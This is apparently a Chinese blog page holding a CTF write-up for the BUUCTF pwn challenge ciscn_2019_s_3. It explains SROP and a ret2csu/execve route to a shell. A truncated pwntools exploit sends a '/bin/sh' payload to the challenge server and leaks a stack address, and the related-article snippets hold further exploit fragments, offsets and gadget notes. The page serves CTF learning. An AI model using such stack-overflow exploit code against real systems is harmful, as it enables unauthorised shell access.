从BUUCTF之ciscn_2019_s_3简单实践SROP和通用gadget+execve系统调用

最新推荐文章于 2023-06-07 15:51:39 发布

原创

最新推荐文章于 2023-06-07 15:51:39 发布 · 810 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#pwn #linux #网络

本文详细介绍了两种漏洞利用技术：SROP（Single Register Operation）和使用通用gadget结合execve调用的解题方法。通过实例演示了如何利用栈溢出进行地址泄漏，并利用找到的地址执行系统调用，获取shell。还探讨了如何通过GDB和实际操作找出栈地址和输入地址的方法。

这题总的来说让我实践了SROP、通用gadget、一些gdb调试体会

第一种解法：SROP

from pwn  import*
context(arch='amd64',os='linux',log_level='debug')#这一句必须加，否则报错
p=remote('node4.buuoj.cn',27793)
leak = '/bin/sh\x00'*2+p64(0x4004ed)
p.sendline(leak)
p.recv(0x20)
addr1=u64(p.recv(8)

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hvf0x

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF buuoj pwn-----第12题: ciscn_2019_s_3

bing_Max的博客

10-09

1765

函数分析编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.

【BUUCTF - PWN】ciscn_2019_s_3

古月浪子的博客

04-17

874

checksec一下，栈溢出 IDA打开看看，main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令，即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget，注意到当rax=0x3b时syscall为execve，只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...

参与评论您还未登录，请先登录后发表或查看评论

【pwn】ciscn_2019_s_3

Nothing

12-14

4868

这题是全国大学生信息安全竞赛的一道线下半决赛题目，好像是华南赛区？例行检查。分析程序。 vul函数两个系统调用，一个是sys_read，一个是sys_write，往栈上写数据（0x400），从栈上读数据（0x30），存在栈溢出。还有一个gadget函数。有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值，看看这两个是什么系统调用...

ciscn_2019_s_3(SROP)

m0_62322730的博客

04-18

471

PWN学习：ciscn_s_3，SROP。萌新的第一篇博客，有任何错误请指正~

buuctf ciscn_2019_s_3

carol2358的博客

04-20

1479

这题对还是萌新的我来说有点难，用的SROP 在这里插入图片描述

BUUCTF pwn ciscn_2019_s_3(SROP)

菜的只能随便写写博客

02-13

1722

0x01 文件分析 0x02 运行有一个回显，并且还有多余的字符显示，接着看代码分析一下。 0x03 IDA源码由后面的函数可以看出，这个程序使用的系统调用，并且vuln里面存在栈溢出。在程序之中的gadgets存在着两个为rax赋值的gadget，15的系统号是rt_sigreturn，3b的系统调用是execve，利用这两个可以执行系统调用得到shell。 ex...

【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用

m0_55368674的博客

02-18

837

【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用

[BUUCTF]PWN——ciscn_2019_es_7[详解]

mcmuyanga的博客

01-12

1989

ciscn_2019_es_7 附件步骤：例行检查，64位程序，开启了nx保护本地试运行一下看看大概的情况 64位ida载入，关键函数很简单，两个系统调用,buf存在溢出看到系统调用和溢出，想到了SROP，之前遇到过一次，关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr

【Pwn】ciscn_2019_s_3 wp 解析(bin/sh+0x50)

Lcw_linyx的博客

05-09

1506

本题用到了ret2csu，也可通过srop，重点讲/bin/sh+0x50

ciscn_2019_s_3

z1r0的博客

12-07

422

ciscn_2019_s_3 查看保护可以溢出，但是没有相应的system和bin_sh，可以使用ret2csu也可以使用srop。没有开pie。这里使用srop，gadgets里给了相应的mov rax, 0FH和vuln的syscall。泄露bin_sh的话动调一下发现在0x20后有一个地址，这个地址距离输入的bin_sh的偏移为0x118，有了bin_sh的地址之后，srop就可以了。 from pwn import * context(arch='amd64', os='linux',

pwn ciscn_2019_s_3

beaster1的博客

03-23

278

pwn ciscn_2019_s_3（srop） checksec一下发现是64位文件并只开了NX保护打开IDA 进入main函数直接转到vuln（可以看到明显栈溢出var_10距离rpb 0x10）发现有两个系统调用号，系统调用号的传参方式是先将调用号传入rax，然后参数依次从左至右传入rdi，rsi，rdx寄存器中，最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp，rsp 程序结束的时候直接是：retn（pop rip）这里直接就跳出vuln函数了所以r

[PWN] BUUCTF ciscn_2019_s_3

空城惜梦的博客

05-31

644

记Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数记录vuln地址：0x4004ED 分析vuln发现进行了系统调用，一个是sys_read，一个是sys_write 调用号：sys_read 的调用号为 0 ；sys_write 的调用号为 1；记录syscall地址：0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,

BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]

半岛铁盒的博客

08-10

468

64位，开启了NX保护 main函数调用了vuln

csicn_2019_s_3

Morphy_Amo的博客

03-06

466

万能gadget、SROP

[BUUCTF-pwn]——ciscn_2019_s_3

Y_peak的博客

02-13

470

[BUUCTF-pwn]——ciscn_2019_s_3 题目地址：https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存

2019ciscn_s_3

Hyrink的博客

06-07

670

ciscn_s_3的两种解法：SROP & ret2csu详解

基于均方误差的64子载波OFDM系统分析

资源摘要信息:"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm" 知识点详细解析： 1. OFDM技术概述：正交频分复用（OFDM）是一种多载波调制技术，主要用于无线通信领域，以提升频谱效率和抵抗多径干扰。...